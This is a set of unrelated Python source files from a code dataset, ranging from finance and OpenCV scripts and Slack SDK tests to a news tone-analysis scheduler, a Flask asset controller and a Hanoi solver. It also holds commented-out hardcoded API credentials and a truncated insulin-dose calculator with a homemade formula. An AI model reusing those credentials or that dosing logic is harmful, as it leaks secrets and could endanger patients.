web.DataReader('AAPL', 'google', start, end)['Close']\nGOOGL = web.DataReader('GOOGL', 'google', start, end)['Close']\n\n#Get percentage change\nAAPL_1_DAY_RETS = AAPL.pct_change(1)\nGOOGL_1_DAY_RETS = GOOGL.pct_change(1)\n\n#Compute and plot one year moving correlation\npd.rolling_corr(AAPL_1_DAY_RETS, GOOGL_1_DAY_RETS, 250).plot()\n\n\n#Least-squares regression\nmodel = pd.ols(y=AAPL_1_DAY_RETS, x={'GOOGL':GOOGL_1_DAY_RETS}, window=250)\n\n#Plot one year beta OLS regression coefficient\nmodel.beta['GOOGL'].plot()\n","sub_path":"rollingCorrelation.py","file_name":"rollingCorrelation.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545142550","text":"import unittest\n\nfrom slack_sdk.signature import SignatureVerifier\n\n\nclass MockClock:\n def now(self) -> float:\n return 1531420618\n\n\nclass TestSignatureVerifier(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n # https://api.slack.com/authentication/verifying-requests-from-slack\n signing_secret = \"8f742231b10e8888abcd99yyyzzz85a5\"\n\n body = \"token=xyzz0WbapA4vBCDEFasx0q6G&team_id=T1DC2JH3J&team_domain=testteamnow&channel_id=G8PSS9T3V&channel_name=foobar&user_id=U2CERLKJA&user_name=roadrunner&command=%2Fwebhook-collect&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT1DC2JH3J%2F397700885554%2F96rGlfmibIGlgcZRskXaIFfN&trigger_id=398738663015.47445629121.803a0bc887a14d10d2c447fce8b6703c\"\n\n timestamp = \"1531420618\"\n valid_signature = (\n \"v0=a2114d57b48eac39b9ad189dd8316235a7b4a8d21a10bd27519666489c69b503\"\n )\n\n headers = {\n \"X-Slack-Request-Timestamp\": timestamp,\n \"X-Slack-Signature\": valid_signature,\n }\n\n def test_generate_signature(self):\n verifier = SignatureVerifier(self.signing_secret)\n signature = verifier.generate_signature(\n timestamp=self.timestamp, body=self.body\n )\n self.assertEqual(self.valid_signature, signature)\n\n def test_generate_signature_body_as_bytes(self):\n verifier = SignatureVerifier(self.signing_secret)\n signature = verifier.generate_signature(\n timestamp=self.timestamp, body=self.body.encode(\"utf-8\")\n )\n self.assertEqual(self.valid_signature, signature)\n\n def test_is_valid_request(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret, clock=MockClock()\n )\n self.assertTrue(verifier.is_valid_request(self.body, self.headers))\n\n def test_is_valid_request_body_as_bytes(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret, clock=MockClock()\n )\n self.assertTrue(\n verifier.is_valid_request(self.body.encode(\"utf-8\"), self.headers)\n )\n\n def test_is_valid_request_invalid_body(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n modified_body = self.body + \"------\"\n self.assertFalse(verifier.is_valid_request(modified_body, self.headers))\n\n def test_is_valid_request_invalid_body_as_bytes(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n modified_body = self.body + \"------\"\n self.assertFalse(\n verifier.is_valid_request(modified_body.encode(\"utf-8\"), self.headers)\n )\n\n def test_is_valid_request_expiration(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n )\n self.assertFalse(verifier.is_valid_request(self.body, self.headers))\n\n def test_is_valid_request_none(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n 
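            # A fixed clock pins "now" to 1531420618, so the test timestamp never looks expired.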
clock=MockClock(),\n )\n self.assertFalse(verifier.is_valid_request(None, self.headers))\n self.assertFalse(verifier.is_valid_request(self.body, None))\n self.assertFalse(verifier.is_valid_request(None, None))\n\n def test_is_valid(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n self.assertTrue(\n verifier.is_valid(self.body, self.timestamp, self.valid_signature)\n )\n self.assertTrue(verifier.is_valid(self.body, 1531420618, self.valid_signature))\n\n def test_is_valid_none(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n self.assertFalse(verifier.is_valid(None, self.timestamp, self.valid_signature))\n self.assertFalse(verifier.is_valid(self.body, None, self.valid_signature))\n self.assertFalse(verifier.is_valid(self.body, self.timestamp, None))\n self.assertFalse(verifier.is_valid(None, None, self.valid_signature))\n self.assertFalse(verifier.is_valid(None, self.timestamp, None))\n self.assertFalse(verifier.is_valid(self.body, None, None))\n self.assertFalse(verifier.is_valid(None, None, None))\n","sub_path":"tests/slack_sdk/signature/test_signature_verifier.py","file_name":"test_signature_verifier.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274744645","text":"import cv2\nprint(cv2.__version__)\ndispW =1280\ndispH =960\nflip =2\n#camSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\n#cam = cv2.VideoCapture(camset) for raspberry pi camera\ncam = cv2.VideoCapture('/dev/video0')\ndispW =int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))\ndispH =int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))\nBW = int(0.3*dispW)\nBH = int(0.2*dispH)\n\nposX =10\nposY =270\ndx =3\ndy =2\n\nwhile True:\n ret, frame = cam.read()\n \n roi =frame[posY:posY+BH,posX:posX+BW].copy()\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2BGR)\n frame[posY:posY+BH,posX:posX+BW] = roi\n cv2.rectangle(frame,(posX,posY),(posX+BW,posY+BH),(255,0,0),3)\n posX = posX + dx\n posY = posY + dy\n if posX<=0 or posX +BW >= dispW:\n dx =dx*(-1)\n if posY <= 0 or posY +BH >= dispH:\n dy =dy*(-1)\n cv2.imshow(\"Gray_roi\",frame)\n cv2.moveWindow(\"Gray_roi\",0,0)\n\n if cv2.waitKey(1)==ord('q'):\n break\n\ncam.release()\ncv2.destroyAllWindows()\n\n# the IDE might not respond always, close the idea and start again","sub_path":"Opencv10-colour_bouncing_on_gray.py","file_name":"Opencv10-colour_bouncing_on_gray.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347001448","text":"import os\nfrom distutils.core import setup\n\nversion = '0.1.1'\nREADME = os.path.join(os.path.dirname(__file__), 'README.md')\nlong_description = open(README).read()\nsetup(name='yt_interaction',\n version=version,\n description=(\"Interaction in yt via HoloViews\"),\n long_description=long_description,\n classifiers=[\n \"Programming Language :: Python\",\n (\"Topic :: Software Development :: Libraries :: Python Modules\"),\n ],\n keywords='data',\n author='Matthew Turk ',\n license='BSD',\n package_dir={'yt_interaction':'yt_interaction'},\n packages=[\"yt_interaction\"],\n install_requires=[\"holoviews\"],\n 
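      # Remaining setup() metadata: project homepage and author contact for the package index.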
url=\"http://bitbucket.org/data-exp-lab/yt_interaction/\",\n author_email=\"matthewturk@gmail.com\",\n)\n","sub_path":"pypi_install_script/yt_interaction-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58972864","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n\nimport logging\nfrom typing import Dict, Optional\nfrom multiprocessing import cpu_count\n\nimport xgboost as xgb\n\nfrom modin.config import Engine\n\nLOGGER = logging.getLogger(\"[modin.xgboost]\")\n\n\nclass ModinDMatrix(xgb.DMatrix):\n \"\"\"\n DMatrix holding on references to DataFrame.\n\n Parameters\n ----------\n data : DataFrame\n Data source of DMatrix.\n label : DataFrame\n Labels used for training.\n\n Notes\n -----\n Currently ModinDMatrix supports only `data` and `label` parameters.\n \"\"\"\n\n def __init__(self, data, label):\n self.data = data\n self.label = label\n\n def __iter__(self):\n yield self.data\n yield self.label\n\n\ndef train(\n params: Dict,\n dtrain: ModinDMatrix,\n *args,\n evals=(),\n nthread: Optional[int] = cpu_count(),\n evenly_data_distribution: Optional[bool] = True,\n **kwargs,\n):\n \"\"\"\n Train XGBoost model.\n\n Parameters\n ----------\n params : dict\n Booster params.\n dtrain : ModinDMatrix\n Data to be trained against.\n evals: list of pairs (ModinDMatrix, string)\n List of validation sets for which metrics will evaluated during training.\n Validation metrics will help us track the performance of the model.\n nthread : int\n Number of threads for using in each node. By default it is equal to\n number of threads on master node.\n evenly_data_distribution : boolean, default True\n Whether make evenly distribution of partitions between nodes or not.\n In case `False` minimal datatransfer between nodes will be provided\n but the data may not be evenly distributed.\n \\\\*\\\\*kwargs :\n Other parameters are the same as `xgboost.train` except for\n `evals_result`, which is returned as part of function return value\n instead of argument.\n\n Returns\n -------\n dict\n A dictionary containing trained booster and evaluation history.\n `history` field is the same as `eval_result` from `xgboost.train`.\n\n .. 
code-block:: python\n\n {'booster': xgboost.Booster,\n 'history': {'train': {'logloss': ['0.48253', '0.35953']},\n 'eval': {'logloss': ['0.480385', '0.357756']}}}\n \"\"\"\n LOGGER.info(\"Training started\")\n\n if Engine.get() == \"Ray\":\n from .xgboost_ray import _train\n else:\n raise ValueError(\"Current version supports only Ray engine.\")\n\n result = _train(\n dtrain, nthread, evenly_data_distribution, params, *args, evals=evals, **kwargs\n )\n LOGGER.info(\"Training finished\")\n return result\n\n\ndef predict(\n model,\n data: ModinDMatrix,\n nthread: Optional[int] = cpu_count(),\n evenly_data_distribution: Optional[bool] = True,\n **kwargs,\n):\n \"\"\"\n Run prediction with a trained booster.\n\n Parameters\n ----------\n model : A Booster or a dictionary returned by `modin.experimental.xgboost.train`.\n The trained model.\n data : ModinDMatrix.\n Input data used for prediction.\n nthread : int\n Number of threads for using in each node. By default it is equal to\n number of threads on master node.\n evenly_data_distribution : boolean, default True\n Whether make evenly distribution of partitions between nodes or not.\n In case `False` minimal datatransfer between nodes will be provided\n but the data may not be evenly distributed.\n\n Returns\n -------\n numpy.array\n Array with prediction results.\n \"\"\"\n LOGGER.info(\"Prediction started\")\n\n if Engine.get() == \"Ray\":\n from .xgboost_ray import _predict\n else:\n raise ValueError(\"Current version supports only Ray engine.\")\n\n if isinstance(model, xgb.Booster):\n booster = model\n elif isinstance(model, dict):\n booster = model[\"booster\"]\n else:\n raise TypeError(\n f\"Expected types for `model` xgb.Booster or dict, but presented type is {type(model)}\"\n )\n result = _predict(booster, data, nthread, evenly_data_distribution, **kwargs)\n LOGGER.info(\"Prediction finished\")\n\n return result\n","sub_path":"modin/experimental/xgboost/xgboost.py","file_name":"xgboost.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586865397","text":"from ..models.feed import Feed\nfrom ..models.archives import Archives\nfrom watson_developer_cloud import ToneAnalyzerV3\nfrom goose3 import Goose\nimport goose3\nimport requests\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sys import platform\nfrom .visuals import render_pie_charts\nimport os\nimport textstat\nimport json\n\n\ndef connect_to_db(db_path):\n \"\"\"This function creates an engine and a session.\n \"\"\"\n my_engine = create_engine(db_path)\n\n # create a configured \"Session\" class\n Session = sessionmaker(bind=my_engine)\n\n # create a Session\n return Session()\n\n\ndef get_news():\n \"\"\"Function that fetches 20 current headlines from the News API\n \"\"\"\n\n url = 'https://newsapi.org/v2/top-headlines?country=us&apiKey={}'.format(os.environ.get('NEWS_API_KEY'))\n response = requests.get(url)\n\n return response.json()['articles']\n\n\ndef extract_text(url):\n \"\"\"Function to extract text from article\n \"\"\"\n g = Goose()\n\n try:\n article = g.extract(url)\n except goose3.network.NetworkError:\n return False\n\n return article.cleaned_text\n\n\ndef analyze_text(text):\n # tone_analyzer = ToneAnalyzerV3(\n # version='2017-09-21',\n # username='637f0158-041b-45af-99c6-1035adfcb148',\n # password='fooszZRwri2t')\n\n tone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n iam_apikey=os.environ.get('WATSON_KEY'),\n 
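        # The IAM API key is read from the environment; WATSON_KEY must be set before this runs.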
url='https://gateway.watsonplatform.net/tone-analyzer/api'\n )\n\n return tone_analyzer.tone(\n {'text': text},\n 'application/json')\n\n\ndef analyze_vocab(text):\n return {\n 'num_words':\n textstat.lexicon_count(text),\n 'flesch_reading_ease':\n textstat.flesch_reading_ease(text),\n 'smog_index':\n textstat.smog_index(text),\n 'flesch_kincaid_grade':\n textstat.flesch_kincaid_grade(text),\n 'coleman_liau_index':\n textstat.coleman_liau_index(text),\n 'automated_readability_index':\n textstat.automated_readability_index(text),\n 'dale_chall_readability_score':\n textstat.dale_chall_readability_score(text),\n 'difficult_words':\n textstat.difficult_words(text),\n 'linsear_write_formula':\n textstat.linsear_write_formula(text),\n 'gunning_fog':\n textstat.gunning_fog(text),\n 'text_standard':\n textstat.text_standard(text, float_output=True)\n }\n\n\n# TODO: This function is too long. Refactor further.\n\ndef job():\n \"\"\"Job to be scheduled for 3-step News Fetch/Extraction/Analyze.\n We can trigger at a specified interval (24-hour for demo purposes.\n 1-hr or less in true production)\n \"\"\"\n\n if platform == \"linux\" or platform == \"linux2\":\n db_path = os.environ.get('RDS_PATH')\n elif platform == \"darwin\":\n db_path = 'postgres://localhost:5432/news_api'\n\n session = connect_to_db(db_path)\n session.query(Feed).delete()\n session.commit()\n\n api_response = get_news()\n\n parsed_article_list = []\n\n for obj in api_response:\n parsed_article = {\n 'title': obj['title'],\n 'url': obj['url'],\n 'description': obj['description'],\n 'source': obj['source']['name'],\n 'date_published': obj['publishedAt'],\n 'image': obj['urlToImage'],\n }\n parsed_article_list.append(parsed_article)\n\n analyzed_articles = []\n\n for article in parsed_article_list:\n url = article['url']\n text = extract_text(url)\n if not text:\n continue\n\n vocab_analysis = analyze_vocab(text)\n tone_analysis = analyze_text(text).get_result()\n\n num_analyzed_sentences = 0\n sentence_breakdown = {\n 'Analytical': 0,\n 'Tentative': 0,\n 'Confident': 0,\n 'Joy': 0,\n 'Anger': 0,\n 'Fear': 0,\n 'Sadness': 0\n }\n if 'sentences_tone' in tone_analysis:\n for sentence in tone_analysis['sentences_tone']:\n if len(sentence['tones']):\n num_analyzed_sentences += 1\n dom_sentence_tone = sorted(\n sentence['tones'],\n key=lambda k: k['score'])[-1]['tone_name']\n sentence_breakdown[dom_sentence_tone] += 1\n for key, val in sentence_breakdown.items():\n sentence_breakdown[key] = round(val / num_analyzed_sentences, 2)\n\n if len(tone_analysis['document_tone']['tones']):\n dom_tone = tone_analysis['document_tone']['tones'][-1]['tone_name']\n article = {\n 'title': article['title'],\n 'url': article['url'],\n 'description': article['description'],\n 'source': article['source'],\n 'date_published': article['date_published'],\n 'image': article['image'],\n 'dom_tone': dom_tone,\n 'num_words': vocab_analysis['num_words'],\n 'sentence_breakdown': sentence_breakdown,\n 'vocab_score': vocab_analysis['text_standard'],\n }\n analyzed_articles.append(article)\n\n try:\n article_to_insert = Feed(\n title=article['title'],\n description=article['description'],\n source=article['source'],\n date_published=article['date_published'],\n url=article['url'],\n dom_tone=article['dom_tone'],\n image=article['image'],\n num_words=article['num_words'],\n sentence_breakdown=article['sentence_breakdown'],\n vocab_score=article['vocab_score'],\n )\n\n article_to_insert_archive = Archives(\n title=article['title'],\n 
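                # Mirrors the Feed row built above; this copy is kept in the long-term archive table.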
description=article['description'],\n                source=article['source'],\n                date_published=article['date_published'],\n                url=article['url'],\n                dom_tone=article['dom_tone'],\n                image=article['image'],\n                num_words=article['num_words'],\n                sentence_breakdown=article['sentence_breakdown'],\n                vocab_score=article['vocab_score'],\n            )\n\n            article_exists = session.query(\n                session.query(Feed).filter_by(title=article['title']).exists()).scalar()\n\n            if not article_exists:\n                session.add(article_to_insert)\n            else:\n                session.commit()\n                continue\n\n            exists = session.query(\n                session.query(Archives).filter_by(title=article['title']).exists()).scalar()\n            if not exists:\n                session.add(article_to_insert_archive)\n            else:\n                # Here create pie chart for each source\n\n\n                render_pie_charts(session)\n                session.commit()\n                continue\n\n        except TypeError:\n            continue\n\n    session.commit()\n","sub_path":"news_api/utils/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166939267","text":"import time\n\nfrom controllers.base import Base\nfrom flask import request\nfrom models.admin import AdminModel\nfrom models.product_plan import ProductPlanModel\nfrom models.product_plan_transfer import ProductPlanTransferModel\nfrom models.transfer_attachments import TransferAttachmentsModel\nfrom models.wallet_flowing import WalletFlowingModel\n\n\nclass Asset(Base):\n\n    def __init__(self):\n        super().__init__()\n        self.ok = 1\n        self.msg = 'ok'\n\n    # 内部账号转账记录\n    def customer_plan_transfer_list(self):\n        # 操作管理员ID\n        token_info = self.check_token()\n        if not isinstance(token_info, dict):\n            return token_info\n\n        user_id = token_info['user_id']\n        # 资产类型\n        asset_type = request.values.get('asset_type', \"1\")\n        if not asset_type.isdigit():\n            asset_type = 0\n        else:\n            asset_type = int(asset_type)\n        if asset_type <= 0 or (asset_type not in [1, 2, 3]):\n            return self.ret_json(10001, '资产类型')\n\n        # 账号ID\n        account_id = request.values.get('account_id', \"0\")\n        if not account_id.isdigit():\n            account_id = 0\n        else:\n            account_id = int(account_id)\n        if account_id <= 0:\n            return self.ret_json(10002, '账号ID错误')\n\n        # 产品方案ID\n        plan_id = request.values.get('plan_id', \"0\")\n        if not plan_id.isdigit():\n            plan_id = 0\n        else:\n            plan_id = int(plan_id)\n\n        filter_dic = dict()\n        filter_dic['account_id'] = account_id\n        if plan_id > 0:\n            filter_dic['product_plan_id'] = plan_id\n        page = int(request.values.get('page', 1))\n        page_size = int(request.values.get('page_size', 20))\n\n        data = ProductPlanTransferModel().get_transfer_list(filter_dic,\n                                                            page=page,\n                                                            page_size=page_size)\n\n        page_info = self.page_info(data['total'], page, page_size)\n        if data['total'] == 0:\n            return self.ret_json(self.ok, self.msg, {\"list\": [], 'page_info': page_info})\n        result_list = []\n        for item in data['list']:\n            item['plan_name'] = Asset.get_plan_name(item[\"product_plan_id\"])\n            item['currency'] = item[\"currency\"].upper()\n            item['apply_type_name'] = Asset.get_apply_type_name(item[\"apply_type\"])\n            item['apply_status_name'] = Asset.get_apply_status_name(item[\"apply_status\"])\n            item['carry_interest_status_name'] = Asset.get_carry_interest_status_name(item[\"carry_interest_status\"])\n            item['apply_time'] = str(item[\"apply_time\"])\n            if item[\"apply_type\"] == 1:\n                item['amount'] = \"+\" + str(float(item['amount']))\n            else:\n                item['amount'] = \"-\" + str(float(item['amount']))\n\n            if item[\"apply_status\"] == 1:\n                item[\"finish_time\"] = \"-\"\n                
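                # Application still pending (apply_status 1): settlement fields are blanked with "-".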
item[\"cumulative_net_value\"] = \"-\"\n item[\"actual_amount_change\"] = \"-\"\n item[\"actual_portion_change\"] = \"-\"\n item[\"accumulated_amount\"] = \"-\"\n item[\"accumulated_portion\"] = \"-\"\n item[\"carry_interest\"] = \"-\"\n item[\"carry_interest_status\"] = \"-\"\n item['carry_interest_status_name'] = \"-\"\n else:\n item[\"cumulative_net_value\"] = item[\"cumulative_net_value\"] if item[\"cumulative_net_value\"] else ''\n item[\"actual_amount_change\"] = item[\"actual_amount_change\"] if item[\"actual_amount_change\"] else ''\n item[\"actual_portion_change\"] = item[\"actual_portion_change\"] if item[\"actual_portion_change\"] else ''\n item[\"accumulated_amount\"] = item[\"accumulated_amount\"] if item[\"accumulated_amount\"] else ''\n item[\"accumulated_portion\"] = item[\"accumulated_portion\"] if item[\"accumulated_portion\"] else ''\n item[\"carry_interest\"] = item[\"carry_interest\"] if item[\"carry_interest\"] else ''\n item[\"finish_time\"] = str(item[\"finish_time\"])\n result_list.append(item)\n del item\n return self.ret_json(self.ok, self.msg, {\"list\": result_list, 'page_info': page_info})\n\n @staticmethod\n def get_plan_name(plan_id):\n plan_info = ProductPlanModel().get_product_plan_info_by_id(plan_id)\n if plan_info:\n return plan_info[\"plan_name\"]\n else:\n return ''\n\n # Application type\n @staticmethod\n def get_apply_type_name(apply_type):\n if apply_type is None or apply_type == 0:\n return '无类型'\n else:\n # 1 = subscription, 2 = redemption, 3 = dividend\n status_map = {'1': '申购', '2': '赎回', '3': '分红'}\n return status_map[str(apply_type)]\n\n # Application status\n @staticmethod\n def get_apply_status_name(apply_status):\n if apply_status is None or apply_status == 0:\n return '无状态'\n else:\n status_map = {'1': '申请中', '2': '成功', '3': '失败'}\n return status_map[str(apply_status)]\n\n # Carry-interest status\n @staticmethod\n def get_carry_interest_status_name(carry_interest_status):\n if carry_interest_status is None or carry_interest_status == 0:\n return '无状态'\n else:\n status_map = {'1': '待结算', '2': '已计算'}\n return status_map[str(carry_interest_status)]\n\n # Detail of a transfer flow record\n def plan_transfer_info(self):\n # ID of the operating administrator\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n\n # Flow record ID\n t_id = request.values.get('id', \"0\")\n if not t_id.isdigit():\n t_id = 0\n else:\n t_id = int(t_id)\n if t_id <= 0:\n return self.ret_json(10002, 'ID为空或者错误')\n\n data = ProductPlanTransferModel().get_transfer_by_id(t_id)\n\n if data is None:\n return self.ret_json(10003, '流水详情为空')\n else:\n apply = dict()\n apply['id'] = data['id']\n apply['apply_time'] = str(data['apply_time'])\n apply['product_plan_id'] = str(data['product_plan_id'])\n apply['product_plan_name'] = Asset.get_plan_name(data['product_plan_id'])\n apply['currency'] = str(data['currency'])\n apply['apply_type'] = str(data['apply_type'])\n apply['apply_type_name'] = Asset.get_apply_type_name(data[\"apply_type\"])\n if data[\"apply_type\"] == 1:\n apply['amount'] = \"+\" + str(float(data['amount']))\n else:\n apply['amount'] = \"-\" + str(float(data['amount']))\n\n apply['user_name'] = Asset.get_user_name(data['user_id'])\n apply['attachments'] = TransferAttachmentsModel().get_transfer_attachments_by_tran_id(t_id)\n # Return the transfer detail according to the application status\n trans = dict()\n trans['apply_status'] = data['apply_status']\n trans['apply_status_name'] = Asset.get_apply_status_name(data['apply_status'])\n trans['remark'] = data['remark']\n if data['apply_status'] == 1:\n trans['finish_time'] = '-'\n else:\n 
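# The handlers above repeat one idiom: read a value from request.values, accept only
# digit strings, cast to int, then range-check. A small helper makes it reusable and
# avoids copy-paste slips between look-alike parameters; parse_positive_int is a
# hypothetical name, and the plain dict stands in for request.values.
def parse_positive_int(values, key, default='0'):
    raw = values.get(key, default)
    return int(raw) if raw.isdigit() else 0

assert parse_positive_int({'account_id': '7'}, 'account_id') == 7
assert parse_positive_int({'account_id': 'x'}, 'account_id') == 0  # non-numeric -> invalid
assert parse_positive_int({}, 'plan_id') == 0                      # missing -> invalid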
trans['finish_time'] = str(data['finish_time'])\n\n result = dict()\n result['apply_info'] = apply\n result['trans_info'] = trans\n return self.ret_json(self.ok, self.msg, result)\n\n @staticmethod\n def get_user_name(user_id):\n user = AdminModel().get_user_info_by_id(user_id)\n if user:\n return user['name']\n else:\n return ''\n\n def plan_transfer_remark(self):\n # ID of the operating administrator\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n # Flow record ID\n t_id = request.values.get('id', \"0\")\n if not t_id.isdigit():\n t_id = 0\n else:\n t_id = int(t_id)\n if t_id <= 0:\n return self.ret_json(10001, 'ID为空或者错误')\n\n # remark\n remark = str(request.values.get('remark', \"\"))\n if remark == '':\n return self.ret_json(10002, 'remark为空')\n\n data = ProductPlanTransferModel().get_transfer_by_id(t_id)\n\n if data is None:\n return self.ret_json(10003, '流水详情为空')\n else:\n update = dict()\n update['remark'] = remark\n update['mtime'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n ret = ProductPlanTransferModel().update_transfer_model(t_id, update)\n if ret is False:\n return self.ret_json(10004, '修改失败')\n else:\n return self.ret_json(self.ok, self.msg)\n\n # Wallet funds flow\n def wallet_flowing(self):\n # ID of the operating administrator\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n # Asset type\n asset_type = request.values.get('asset_type', \"1\")\n if not asset_type.isdigit():\n asset_type = 0\n else:\n asset_type = int(asset_type)\n if asset_type <= 0 or (asset_type not in [1, 2, 3]):\n return self.ret_json(10001, '资产类型')\n\n # Account ID\n account_id = request.values.get('account_id', \"0\")\n if not account_id.isdigit():\n account_id = 0\n else:\n account_id = int(account_id)\n if account_id <= 0:\n return self.ret_json(10002, '账号ID错误')\n\n page = int(request.values.get('page', 1))\n page_size = int(request.values.get('page_size', 20))\n\n data = WalletFlowingModel().get_flow_list(account_id=account_id,\n page=page,\n page_size=page_size)\n\n page_info = self.page_info(data['total'], page, page_size)\n if data['total'] == 0:\n return self.ret_json(self.ok, self.msg, {\"list\": [], 'page_info': page_info})\n\n result_list = data['list']\n for item in result_list:\n item['amount'] = str(float(item['amount']))\n item['ctime'] = str(item['ctime'])\n\n return self.ret_json(self.ok, self.msg, {\"list\": result_list, \"page_info\": page_info})\n\n # Edit the note on a flow record\n def wallet_flowing_edit(self):\n # ID of the operating administrator\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n\n w_id = request.values.get('id', \"\")\n if not w_id.isdigit():\n w_id = 0\n else:\n w_id = int(w_id)\n if w_id <= 0:\n return self.ret_json(10001, 'id为空或者错误')\n\n # Note\n remark = str(request.values.get('remark', ''))\n if remark == '':\n return self.ret_json(10002, '说明为空')\n params = dict()\n params['remark'] = remark\n params['mtime'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n params['user_id'] = user_id\n result = WalletFlowingModel().update_flow_remark(w_id, params)\n\n if result is False:\n return self.ret_json(1003, '更新错误')\n else:\n return self.ret_json(self.ok, 
self.msg)\n","sub_path":"controllers/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":11952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"225715910","text":"# Recursive way\n# Time complexity - O(2^n)\nstep=0\ndef hanoi(n, source, target, temp):\n global step\n if n == 0:\n return\n else:\n hanoi(n-1, source, temp, target)\n step += 1\n print(f\"Move disk {n} from [{source}] to [{target}]\")\n hanoi(n-1, temp, target, source)\n\nhanoi(5, 'A', 'B', 'C')\nprint(f\"total {step} moves\")","sub_path":"DS_Python/Practice/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149104354","text":"def numunits(carbs, perunit, number, startscale, rnge):\n # Base food units, no high\n units = round(carbs / perunit, 2)\n print(\"You should give \" + str(units) + \" units for the food.\")\n\n # Extra units for the high\n if number >= startscale:\n exunits = (number - (startscale - rnge)) / (rnge / .5)\n print(\"You should give an extra \" + str(exunits) + \" units for the food.\")\n print(\"You should give a total of \" + str(units + exunits) + \" units\")\n else:\n print(\"Your number is great! You need to give no extra units!\")\n\n # Finishing\n input(\"\\nPress enter when finished . . . \")\n\n\ndef intro():\n data = {}\n # Ugly code to keep attempting to get the correct input per meal\n while True:\n # carbs:unit at breakfast\n try:\n data[\"Breakfast\"] = int(input(\"For every ___ carbs at breakfast, I give 1 unit.\" +\n \"(Answer with a whole number): \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # carbs:unit at lunch\n try:\n data[\"Lunch\"] = int(input(\"For every ___ carbs at lunch, I give 1 unit.(Answer with a whole number): \")\n .strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # carbs:unit at dinner\n try:\n data[\"Dinner\"] = int(input(\"For every ___ carbs at dinner, I give 1 unit.\" +\n \"(Answer with a whole number): \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # BG for start of sliding scale\n try:\n data[\"startScale\"] = int(input(\"At what blood glucose does your sliding scale begin: \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # Range for sliding scale\n try:\n data[\"rnge\"] = int(input(\"For every ___ points above the start of my sliding scale, I increase my dosage.\"\n \"(Answer with a whole number): \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n return data\n\n\ndef getcarbs():\n # Loop simply so it's not in the main. Keeps trying to get carbs until number is input\n while True:\n try:\n carbs = int(input(\"How many carbs are in your meal: \").strip())\n break\n except ValueError:\n print(\"That was not an accepted input, please try again.\")\n return carbs\n\n\ndef getnum():\n # Loop simply so it's not in the main. 
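# A quick check on the recursion in hanoi.py above: moving n disks always takes
# 2**n - 1 moves, which the global step counter reproduces. Minimal sketch with a
# local count instead of module state:
def hanoi_moves(n):
    return 0 if n == 0 else 2 * hanoi_moves(n - 1) + 1

assert hanoi_moves(5) == 2 ** 5 - 1  # 31, matching the "total 31 moves" printout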
